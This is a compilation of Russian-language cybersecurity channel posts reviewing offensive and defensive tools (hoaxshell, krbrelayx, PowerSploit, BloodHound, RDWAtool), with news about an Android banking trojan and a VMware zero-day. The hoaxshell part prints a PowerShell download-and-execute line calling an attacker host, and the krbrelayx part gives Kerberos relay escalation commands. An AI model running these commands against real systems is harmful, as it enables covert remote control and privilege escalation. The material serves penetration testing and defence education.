RDWAtool: Аудит и анализ контроллеров домена Active Directory

RDWAtool (Remote Directory Writable Attributes Tool) — утилита, разработанная французским исследователем безопасности p0dalirius. Задача — автоматизировать процесс аудита прав доступа к атрибутам объектов в Active Directory.

Инструмент подключается к контроллеру домена и проверяет, к каким атрибутам (номеру телефона, описанию должности, почтовому адресу) пользователь или компьютер имеют права на запись. Это позволяет быстро ответить на вопросы:
🟧Какие данные в домене я могу изменить?
🟧Не являются ли эти права избыточными и не создают ли они угрозу для безопасности?
🟧Какие атрибуты могут быть использованы злоумышленником для эскалации привилегий или перемещения по сети?

🟧Клонируем репозиторий

git clone https://github.com/p0dalirius/RDWAtool.git

🟧Переходим в директорию с инструментом

cd RDWAtool

🟧Устанавливаем необходимые Python-библиотеки

pip3 install -r requirements.txt

🟧Проверяем

RDWAtool -h

🟧Минимальная команда для запуска требует указания учетных данных пользователя домена и целевого контроллера домена (DC)

python3 rdwatool.py -u 'DOMAIN\Username' -p 'Password' -d 'dc.domain.local'

Где:
-u / --username - имя пользователя в формате DOMAIN\Username
-p / --password - пароль пользователя
-d / --domain - DNS-имя или IP-адрес контроллера домена.

После выполнения команды

RDWAtool

начнет сканирование, выводя в реальном времени список объектов

AD

и записываемых для них атрибутов.

🟧Сканировать только пользователей

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --users

🟧Сканировать только компьютеры

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --computers

🟧RDWAtool применяется в различных сценариях
🟧Red Team - выявляет векторы для эскалации привилегий через записываемые атрибуты для атак (Key Credential Attack, Golden Tickets).
🟧Blue Team - обнаруживает избыточные права в AD для соблюдения Principle of Least Privilege и устранения векторов атак.
🟧Администраторы - анализирует права на запись атрибутов для расследования инцидентов и планирования изменений.

🤖 ИИ внедряется в работу SOC

📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков.

🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз.

📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету.

🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований.

📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ.

⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.

➡️ Что такое STIX и TAXII?

❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны?

🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты

🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме.

👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике?

Пример STIX:

{
  "type": "bundle",
  "id": "bundle--12345678-1234-1234-1234-123456789abc",
  "objects": [
    {
      "type": "indicator",
      "id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
      "created": "2025-09-30T12:00:00Z",
      "modified": "2025-09-30T12:00:00Z",
      "name": "Malicious IP Address",
      "description": "Known IP address associated with malware command and control",
      "pattern": "[ipv4-addr:value = '192.0.2.1']",
      "pattern_type": "stix",
      "valid_from": "2025-09-01T00:00:00Z"
    }
  ]
}

Этот пример описывает "индикатор" — IP-адрес 192.0.2.1, который ассоциируется с вредоносной активностью. В STIX используются объекты с типами, например "indicator", а также указывается паттерн (pattern) для обозначения конкретного признака угрозы.

📱 Банковский Android-троян атакует пожилых людей!

👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях.

🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания.

📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия.

📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:

Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
Живые годы (orgLivelyYears.browses646)
ActiveSenior (com.forest481.security)
DanceWave (inedpnok.kfxuvnie.mggfqzhl)
作业帮 (io.mobile.Itool）
麻豆传媒 (fsxhibqhbh.hlyzqkd.aois
麻豆传媒 (mobi.audio.aassistant)
谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
MT管理器 (varuhphk.vadneozj.tltldo)
MT管理器 (spvojpr.bkkhxobj.twfwf)
大麦 (mnamrdrefa.edldylo.zish)
MT管理器 (io.red.studio.tracker)

⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows

Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.

📌 Уникальность Hoaxshell
Традиционные методы получения обратного соединения (reverse shell) через PowerShell часто сталкиваются с проблемами: встроенные защитные механизмы Windows (AMSI), системы обнаружения вторжений (IDS) и межсетевые экраны легко распознают и блокируют стандартные шаблоны трафика.
Hoaxshell обходит эти препятствия за счет двух ключевых особенностей:
- В отличие от сырых TCP-сокетов, hoaxshell использует HTTP/S-запросы для коммуникации. Это позволяет ему маскировать свой трафик под легитимную активность веб-браузера или другого приложения, что значительно усложняет его обнаружение.
- Инструмент генерирует команды PowerShell, которые не содержат явных признаков вредоносной активности. Эти команды динамически получают инструкции от сервера, что позволяет обходить статические сигнатуры антивирусов.

⬇️Установка

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

⬇️Проверка

hoaxshell -h

⚪Запуск сервера
Серверная часть hoaxshell запускается на машине тестировщика (атакующего). Самый простой способ — запустить его на всех интерфейсах, указав порт.

sudo python3 hoaxshell.py -s 8080

После запуска скрипт сгенерирует уникальную команду PowerShell, которую необходимо выполнить на целевой машине. Это будет выглядеть примерно так:

PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")

⚪Вариации для обхода защиты
Для шифрования трафика и лучшей маскировки можно использовать встроенный сервер с SSL.

sudo python3 hoaxshell.py -s 443 -t ssl

В этом случае команда для цели будет использовать

https://

. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.

📌 Меры защиты от инструментов типа hoaxshell
- Мониторинг сетевой активности (выявление регулярных HTTP/S-сессий между внутренними хостами и внешними IP)
- Аудит журналов PowerShell
(контроль событий выполнения внешнего кода (например, через DownloadString))
- Ограничение возможностей PowerShell (использование Constrained Language Mode для блокировки выполнения скриптов)
- Сегментация сети (блокировка несанкционированных исходящих HTTP/S-подключений с рабочих станций)

Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @CodebyManagerBot

🇨🇳 Китайские хакеры используют Zero-day в VMware!

📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMware с октября 2024 года. По данным NVISO Labs , недавно исправленная уязвимость безопасности, затрагивающая Broadcom VMware Tools и VMware Aria Operations, эксплуатировалась как уязвимость нулевого дня с середины октября 2024 года злоумышленником под именем UNC5174.

❗️ Злоумышленники используют уязвимость CVE-2025-41244 с оценкой CVSS: 7,8, эксплуатируя локальную ошибку повышения привилегий в функции get_version(). Затрагиваются такие продукты, как VMware Cloud Foundation, VMware vSphere Foundation, VMware Aria Operations, VMware Telco Cloud Platform и VMware Telco Cloud Infrastructure.

🔎 Исследователь NVISO Максим Тибо обнаружил уязвимость и сообщил о ней 19 мая 2025 года. Компания также заявила, что VMware Tools 12.4.9, входящий в состав VMware Tools 12.5.4, устраняет эту проблему в 32-разрядных системах Windows, а версия open-vm-tools, устраняющая CVE-2025-41244, будет распространяться поставщиками Linux.

💻 По данным NVISO, уязвимость коренится в функции под названием «get_version()», которая принимает шаблон регулярного выражения (regex) в качестве входных данных для каждого процесса с прослушивающим сокетом, проверяет, соответствует ли двоичный файл, связанный с этим процессом, шаблону, и, если соответствует, вызывает команду версии поддерживаемой службы.

💻 Как утверждает эксперт, широкая практика имитации системных двоичных файлов (например, httpd) подчеркивает реальную возможность того, что несколько других видов вредоносного ПО в течение многих лет случайно извлекали выгоду из непреднамеренного повышения привилегий

❗️ Так что, если используете в своих инфраструктурах продукты VMware, то будьте внимательны!

krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory

krbrelayx — это мощный набор Python-утилит для тестирования безопасности инфраструктуры Active Directory, в частности Kerberos и NTLM-аутентификации. Инструмент позволяет исследовать и эксплуатировать уязвимости, связанные с relay-атаками (Kerberos relay, LDAP relay).

🪛 Основные возможности krbrelayx
➡️ Kerberos Relay Attacks — реализация атак по принципу NTLM relay, но с использованием Kerberos (через S4U2Proxy/S4U2Self).
➡️ LDAP и LDAPS Relay — получение привилегий и добавление аккаунтов через перехваченные тикеты.
➡️ Resource-based Constrained Delegation (RBCD) exploitation — автоматизация добавления себя в делегирование и эскалация прав до Domain Admin.
➡️ Поддержка различных сервисов: LDAP, SMB, HTTP, MSSQL и др.
➡️ Интеграция с другими инструментами: можно использовать вместе с impacket, ntlmrelayx, getST.py и adidnsdump.
➡️ Тонкая настройка сценариев: выбор цели, фильтров LDAP, а также логирование и отладка запросов Kerberos.


⬇️ Установка и запуск
Клонируйте репозиторий:

git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
pip install -r requirements.txt

Для запуска, например, LDAP-релея:

python3 krbrelayx.py --target ldap://dc01.corp.local --escalate-user attacker

Можно использовать с различными параметрами для указания SPN, делегирования и типов тикетов (TGS, TGT).

Пример для атаки через Kerberos:

python3 krbrelayx.py -t ldap://dc.corp.local --delegate-from victim$ --delegate-to target$ --add-computer attacker$

⚙️ Преимущества krbrelayx
⏺️ Позволяет исследовать реальные Kerberos relay-уязвимости без необходимости ручного построения пакетов.
⏺️ Поддерживает комплексные сценарии атак на делегирование (RBCD, unconstrained и constrained).
⏺️ Совместим с современными версиями Windows Server и Active Directory.

Гайд по восстановлению данных: метаданные, карвинг и работа с образами.

🪵Удалили файл и тут же об этом пожалели? Не всё потеряно. В нашей новой статье разбираем, что на самом деле происходит с данными после удаления и как их можно вернуть.

Рассказываем простыми словами о сложных вещах:
🔵Как правильно создать образ сбойного диска утилитой ddrescue
🔵Как попытаться восстановить файлы с именами и папками
🔵Что такое файловый карвинг и когда он — последняя надежда
🔵Почему для SSD и флешек эти инструкции могут не сработать.

📎Лучший способ не потерять данные — быть готовым к их восстановлению. Сохраняйте подробный гайд и действуйте на опережение!

🚩 Новые задания на платформе HackerLab!

🔎 Категория OSINT — Канатная дорога

🌍 Категория Веб — Nova Arts

Приятного хакинга!

Readpe: Мастер-инспектор для PE-файлов под Linux

Readpe — это дизассемблер и анализатор PE-файлов. Его ключевое преимущество — кроссплатформенность. Многие аналогичные инструменты заточены под Windows, а readpe компилируется и работает в средах Linux, что делает его незаменимым в арсенале специалистов, которые предпочитают или вынуждены проводить анализ на Unix-подобных системах.

⚡Чем Readpe отличается от других утилит (например, от стандартного objdump)?
- Инструмент сфокусирован исключительно на формате PE. Он предоставляет информацию обо всех критически важных частях файла: заголовках DOS и PE, секциях, таблице импорта и экспорта, ресурсах, отладочной информации и сертификатах.
- Инструмент выводит информацию в отформатированном виде, что значительно ускоряет ее восприятие и анализ по сравнению.
- Readpe может дизассемблировать секции кода, преобразуя машинные инструкции в читаемый ассемблерный код.

▶️Устанавливаем

git clone https://github.com/mentebinaria/readpe.git
cd readpe
sudo make install
echo "/usr/local/lib" | sudo tee /etc/ld.so.conf.d/libpe.conf
sudo ldconfig

▶️Проверяем

readpe --h

▶️Общая информация о файле
Ключ -H выводит сводную информацию из заголовков

readpe -H notepad.exe

Вывод покажет архитектуру (

x86/x64

), точку входа, характеристики файла, размеры секций и другую метаинформацию.

▶️ Анализ таблицы импорта
Одна из самых востребованных функций. Какие внешние библиотеки и функции использует программа?

readpe -i notepad.exe

Вы увидите список всех импортированных

DLL

(например,

KERNEL32.DLL, USER32.DLL, GDI32.DLL

) и конкретных функций из них (

CreateFile, MessageBox, GetSystemTime и т.д.

). Это мгновенно дает понимание о потенциальных возможностях анализируемого файла.

▶️Просмотр секций
Ключ -S отображает все секции файла (.text, .data, .rdata, .rsrc и др.).

readpe -S notepad.exe

В выводе вы найдете имена секций, их виртуальные и физические размеры, атрибуты доступа. Это важно для оценки, например, наличия нестандартных или исполняемых секций с атрибутом на запись — частый признак уязвимости или зловредной техники.

А вы знали что...
🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🔸Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🔸Хакерские атаки на Android выросли на 50% за последние 2 года (данные Kaspersky Lab).

Знание этих рисков – первый шаг к безопасности. Второй – освоить инструменты, которые помогут их устранить. Стартуем 20 октября! 👩‍💻

🔴Записаться

Рассмотрим устройство приложений под ОС Android, этапы создания мобильного приложения, приемы реверса и изменения кода. Подробно изучим поиск и эксплуатацию уязвимостей.

Курс создан для:
🌟 Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений

🚀 По всем вопросам пишите @CodebyManagerBot

Продолжаем мотивировать вас на обучение! 🧑‍💻

Академия Кодебай поделилась уроками для CyberCamp2025 на темы:

😎 Реагирование на компьютерные инциденты
Рассмотрим 4 этапа реагирования: подготовка, обнаружение, анализ и сдерживание. В рамках каждого этапа представлено описание процессов, технологий и возможных артефактов при проведении криминалистического анализа, а также перечень мероприятий, проводимых после инцидента.

😎 Пентест инфраструктуры Active Directory
Изучим основные элементы пентеста: уязвимые конфигурации списков доступа, получение первоначального доступа и сохранение доступа к системе. Вся практическая часть представлена в виде наглядных видео-уроков 👨‍💻

😎 OSINT: технология боевой разведки
Проанализируем виды идентификаторов в открытых источниках: электронная почта, никнейм, профили в социальных сетях, и даже IP-адрес 👻

©️ Регистрация l 😺 Чат

BloodHound — Визуализация и анализ путей эскалации в Active Directory

BloodHound Legacy — оригинальная реализация известного проекта BloodHound для картирования связей в Active Directory. Инструмент собирает данные об объектах AD (пользователи, группы, компьютеры, ACL, делегирование и т.д.), загружает их в графовую базу Neo4j и отображает в удобном графическом интерфейсе, позволяющем быстро находить пути эскалации.

Основные возможности BloodHound Legacy
⏺️ Сбор данных SharpHound-коллектором: собирает информацию по множеству «сводных» источников — сессии, групповые членства, ACL, делегирование, SPN и др. (данные затем загружаются в Neo4j).
⏺️ Визуализация графа привилегий: поиск кратчайших путей до Domain Admin, фильтры и преднастроенные запросы на примечательные сценарии эскалации.
⏺️ Набор готовых запросов/паттернов (которые удобнее исполнять в GUI) для быстрого обнаружения опасных конфигураций — например, неочевидных прав доступа или делегирования.
⏺️ Экспорт/импорт собранных данных (JSON/ZIP) — удобно включать в отчёты и последующий анализ.
⏺️ Подходит для оффлайн-анализа: можно загрузить заранее собранные данные и работать с ними локально в GUI.

⬇️ Установка и запуск (общая инструкция, Legacy)
1️⃣ Скачайте BloodHound CLI — это утилита, которая автоматически развернёт весь стек в Docker Compose. Выберите релиз под вашу ОС/архитектуру и скачайте (в примере — Linux AMD64):

wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz

(для macOS / Windows используйте соответствующие бинарники).

2️⃣ Распакуйте скачанный архив:

tar -xvzf bloodhound-cli-linux-amd64.tar.gz

После распаковки у вас появится исполняемый bloodhound-cli.

3️⃣ Запустите установку (в той же папке, где лежит bloodhound-cli):

./bloodhound-cli install

Инсталлятор загрузит docker-compose.yml, создаст тома и контейнеры (Postgres, Neo4j/graph-db, application, web UI) и запустит их. В процессе в терминале будет выведен сгенерированный пароль администратора.

❓ Преимущества BloodHound Legacy
➡️ Даёт наглядное представление о сложных взаимосвязях в AD — графы делают очевидными скрытые пути эскалации.
➡️ Широко известен и принят в сообществе — много готовых гайдов, курсов и правил детекции.
➡️ Гибкость в анализе: можно загружать кастомные данные и писать собственные запросы для поиска необычных сценариев.

В настоящее время BloodHound стал классикой для пентестеров и специалистов по безопасности. Было бы круто услышать ваши отзывы и кейсы — пишите в комментариях свои истории использования, лайфхаки или нестандартные находки!

PowerSploit — Модульный PowerShell-фреймворк для пост-эксплуатации

PowerSploit — это коллекция PowerShell-модулей и скриптов, предназначенных для помощи пентестерам и red-team специалистам на этапах пост-эксплуатации: выполнение кода, повышение привилегий, обход защиты, сбор информации и вывод данных. Проект содержит набор готовых функций для инъекции кода, извлечения учётных данных, поиска в системе уязвимостей конфигурации и других задач, характерных для работы после получения начального доступа.

⚡️ Основные возможности PowerSploit
⏺️ Code execution / инъекция и загрузка шелл-кодa — функции вроде Invoke-Shellcode и Invoke-ReflectivePELoad позволяют запускать произвольный код в контексте процесса Windows.
⏺️ PrivEsc (повышение привилегий) — модуль PowerUp и другие скрипты собирают и проверяют распространённые векторы повышения привилегий в Windows-окружении.
⏺️ Credential access / извлечение учётных данных — инструменты и обёртки для вызова Mimikatz и других техник получения паролей/хэшей.
⏺️ Persistence, Evasion, Recon & Exfiltration — скрипты для устойчивого присутствия, обхода AV/EDR (включая техники «fileless»), сбора информации о системе и экспорта данных.
⏺️ Модульная структура и экспорт — удобный набор отдельных модулей (CodeExecution, Privesc, Exfiltration и др.) для выборочной загрузки и использования в сценариях.

⬇️ Установка и быстрый запуск
PowerSploit может использоваться как локально (импорт модулей в интерактивный PowerShell), так и развертываться через PowerShell Gallery/загрузку с GitHub.

Пример скачивания и импорта модуля:

git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
# импорт конкретного скрипта, например PowerUp
Import-Module .\Privesc\PowerUp.ps1
# или выполнить функцию прямо из файла
.\Privesc\PowerUp.ps1
Invoke-AllChecks

Также имеется пакетная публикация/манифест для PowerShell Gallery (версия PowerSploit 3.0.0.0), что упрощает установку через PowerShellGet. При использовании в реальных тестах предупреждаем: многие EDR/AV детектируют активности PowerSploit, поэтому запускать инструменты следует только в тестовых средах.

⚙️ Преимущества PowerSploit
➡️ Широкий набор готовых техник — экономит время в post-exploit фазе, объединяя распространённые приёмы в одном наборе.
➡️ Модульность и читаемость — скрипты на PowerShell легко адаптировать под конкретные сценарии и изучать для обнаружения и защиты.
➡️ Активное признание в сообществе — PowerSploit фигурирует в учебных материалах, чек-листах по атаке/защите и в базах знани (MITRE/S0194).